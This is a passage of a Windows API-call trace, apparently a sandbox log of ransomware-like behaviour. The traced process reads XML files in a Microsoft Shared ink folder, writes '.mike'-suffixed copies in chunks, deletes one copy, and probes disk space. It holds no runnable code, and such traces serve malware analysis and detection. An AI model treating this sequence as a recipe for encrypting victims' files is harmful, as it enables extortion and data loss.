(hFile=0x264) returned 0x1 [0045.276] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.276] WriteFile (in: hFile=0x264, lpBuffer=0x22a5c2c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22a5c2c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), fInfoLevelId=0x0, lpFileInformation=0x22a571c | out: lpFileInformation=0x22a571c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7)) returned 1 [0045.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.277] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.277] GetFileType (hFile=0x264) returned 0x1 [0045.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.278] GetFileType (hFile=0x264) returned 0x1 [0045.278] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.278] ReadFile (in: hFile=0x264, lpBuffer=0x22a6d5c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22a6d5c*, lpNumberOfBytesRead=0x2af080*=0x2d7, lpOverlapped=0x0) returned 1 [0045.279] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.280] GetFileType (hFile=0x264) returned 0x1 [0045.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.280] GetFileType (hFile=0x264) returned 0x1 [0045.280] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.280] WriteFile (in: hFile=0x264, lpBuffer=0x22aad34*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22aad34*, lpNumberOfBytesWritten=0x2af074*=0x2e0, lpOverlapped=0x0) returned 1 [0045.280] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.280] GetFileType (hFile=0x264) returned 0x1 [0045.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.280] GetFileType (hFile=0x264) returned 0x1 [0045.281] WriteFile (in: hFile=0x264, lpBuffer=0x22adf64*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22adf64*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5317640, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5317640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5317640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x500)) returned 1 [0045.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.282] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22af710 | out: lpFileInformation=0x22af710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5317640, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5317640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5317640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x500)) returned 1 [0045.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", dwFileAttributes=0x80) returned 0 [0045.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.283] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5317640, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5317640, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5317640, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x500)) returned 1 [0045.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpFilePart=0x0) returned 0x4b [0045.284] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike", lpFilePart=0x0) returned 0x50 [0045.284] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.mike")) returned 1 [0045.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.286] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.287] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.288] GetFileType (hFile=0x264) returned 0x1 [0045.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.288] GetFileType (hFile=0x264) returned 0x1 [0045.288] CloseHandle (hObject=0x264) returned 1 [0045.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.288] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b1848 | out: lpFileInformation=0x22b1848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655)) returned 1 [0045.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.288] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.288] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b1b64 | out: lpFileInformation=0x22b1b64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655)) returned 1 [0045.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.289] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.289] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.289] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.289] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.289] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.290] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.290] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.290] GetFileType (hFile=0x264) returned 0x1 [0045.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.290] GetFileType (hFile=0x264) returned 0x1 [0045.290] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.290] WriteFile (in: hFile=0x264, lpBuffer=0x22b29f4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22b29f4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.291] CloseHandle (hObject=0x264) returned 1 [0045.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.291] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), fInfoLevelId=0x0, lpFileInformation=0x22b24f8 | out: lpFileInformation=0x22b24f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655)) returned 1 [0045.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.291] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.292] GetFileType (hFile=0x264) returned 0x1 [0045.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.292] GetFileType (hFile=0x264) returned 0x1 [0045.292] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0045.292] ReadFile (in: hFile=0x264, lpBuffer=0x22b3b1c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b3b1c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.294] CloseHandle (hObject=0x264) returned 1 [0045.294] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.294] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.294] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.294] GetFileType (hFile=0x264) returned 0x1 [0045.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.295] GetFileType (hFile=0x264) returned 0x1 [0045.295] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0045.295] WriteFile (in: hFile=0x264, lpBuffer=0x22be084*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22be084*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.295] CloseHandle (hObject=0x264) returned 1 [0045.296] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.296] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.296] GetFileType (hFile=0x264) returned 0x1 [0045.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.296] GetFileType (hFile=0x264) returned 0x1 [0045.296] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: 